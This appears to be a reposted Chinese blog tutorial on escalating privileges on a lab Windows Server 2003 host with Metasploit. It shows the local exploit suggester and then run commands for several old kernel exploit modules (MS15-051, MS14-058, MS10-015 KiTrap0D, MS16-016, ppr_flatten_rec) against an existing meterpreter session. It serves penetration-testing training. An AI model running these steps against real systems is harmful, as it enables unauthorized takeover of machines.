zoukankan      html  css  js  c++  java

  • msf利用- windows内核提权漏洞

     windows内核提权漏洞

     

    环境:

    Kali Linux(攻击机) 192.168.190.141

    Windows2003SP2(靶机) 192.168.190.147

     

     

     

    0x01寻找可利用的exp

    实战中我们在拿到一个反弹shell(meterpreter)下一步会进行提权操作,而metaspolit的内置模块Local Exploit Suggester。这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权。

    如下图,有一个普通用户权限的会话

     

     

     

     

    在拿到meterpreter会话的前提下,我们可以利用这个模块进行收集

     

     

     

     

     

     

    可以看到我这里有和目标机的一个session会话,id4,我们使用local_exploit_suggester模块

     

    

    

    use post/multi/recon/local_exploit_suggester

 

set LHOST 192.168.190.141

 

set SESSION 1

 

Exploit
    

    

    


    

     
    

     
    

     
    

    如下图所示,它自动的为我们匹配出了一些可能的用于易受攻击目标提权的漏洞利用的exp模块。
    

     
    

    0x02 利用exp提权
    

    根据metaspolit的内置模块Local Exploit Suggester模块列出的可利用模块,我们来进行提权,提权成功后会返回新的、提升权限成功后的session会话。
    

    选取了几个常见的可利用的模块来进行提权演示。
    

     
    

    Windows ClientCopyImage Win32k Exploit(ms15_051)
    Windows内核模式驱动程序中的漏洞让攻击者可以进行提权。
    这个模块利用了win32k.sys内核模式驱动程序中不正确的对象处理。
    

     
    

     
    

    使用模块 查看设置的参数
    

    

    设置参数 提权
    

    

    use exploit/windows/local/ms15_051_client_copy_image

set lhost 192.168.190.141

set session 4

exploit
    

    


    

     
    

     
    

    Windows TrackPopupMenu Win32k NULL Pointer Dereference(ms14_058)
    该模块利用了win32k.sys中的NULL Pointer Dereference,这个漏洞可以通过使用TrackPopupMenu来触发。在特定情况下,可以在xxxSendMessage Timeout上滥用NULL Pointer Dereference来获取任意代码执行。
    这个模块已经在Windows XP SP3,Windows Server 2003 SP2,Windows7 SP1,Windows Server2008 32位和Windows Server2008R2 SP164位上测试过。
    

    

    use exploit/windows/local/ms14_058_track_popup_menu

set lhost 192.168.190.141

set session 4

exploit
 
    

    


     
    

     
    

    通过KiTrap0D进行Windows系统提权(ms10_015)
    这个模块会通过Kitrap0D这个exp来生成一个SYSTEM权限的新会话,如果当前会话已经是SYSTEM权限,那么这个脚本将不起作用。这个脚本依赖于kitrap0d.x86.dll这个文件,而且不支持64位的Windows操作系统。
    该模块已经在存在漏洞的Windows Server 2003,Windows Server 2008,Windows7和XP上测试过,只限32位操作系统。
    

     
    

    

    use exploit/windows/local/ms10_015_kitrap0d

set lhost 192.168.190.141

set session 4

exploit
    

    


    

     
    

     
    

    mrxdav.sys WebDav本地提权MS16-016
    这个exp利用的是mrxdav.sys中的漏洞,漏洞编号是MS16-016。该模块会在目标主机上生成一个进程,并通过在特权进程的环境下执行指定的payload来提权。
    该模块在存在漏洞的Windows7 SP1 x86架构上测试过可行。
    

    

    use exploit/windows/local/ms16_016_webdav

set lhost 192.168.190.141

set session 4

exploit
    

    


    

     
    

     
    

     
    

     
    

    EPATHOBJ::pprFlattenRec本地提权
    这个漏洞是由于EPATHOBJ::pprFlattenRec使用了未初始化的数据而产生的,该漏洞可以对内存产生破坏。
    而我们的这个脚本就是利用这个漏洞来提权的。
    

    这个模块已经在Windows XP SP3,Windows2003SP1和Windows7SP1上成功执行。
    

    

    use exploit/windows/local/ppr_flatten_rec

set lhost 192.168.190.141

set session 4

exploit
 
    

    


    因为实验是sp2就没有成功
    

     
    

     
    

    
    
                
    
                
              
    • 
              
    
              
  • 

                相关阅读:
    
                
                  Appium Android Bootstrap源码分析之控件AndroidElement
                    
    Appium Android Bootstrap源码分析之简介
                    
    monkey源码分析之事件注入方法变化
                    
    安卓Monkey源码分析之运行流程
                    
    adb概览及协议参考
                    
    MAC中在eclipse luna上搭建移动平台自动化测试框架(UIAutomator/Appium/Robotium/MonkeyRunner)关键点记录
                    
    MonkeyImage API 实践全记录
                    
    Structs 2 session 学习
                    
    The First
                    
    用例图
                    
                        
              
    • 
              
    
              
  • 
                原文地址:https://www.cnblogs.com/-qing-/p/10609714.html
              
    • 

            

          



          
          

            

            

          

        

      

      



      

      

        

          Copyright © 2011-2022 走看看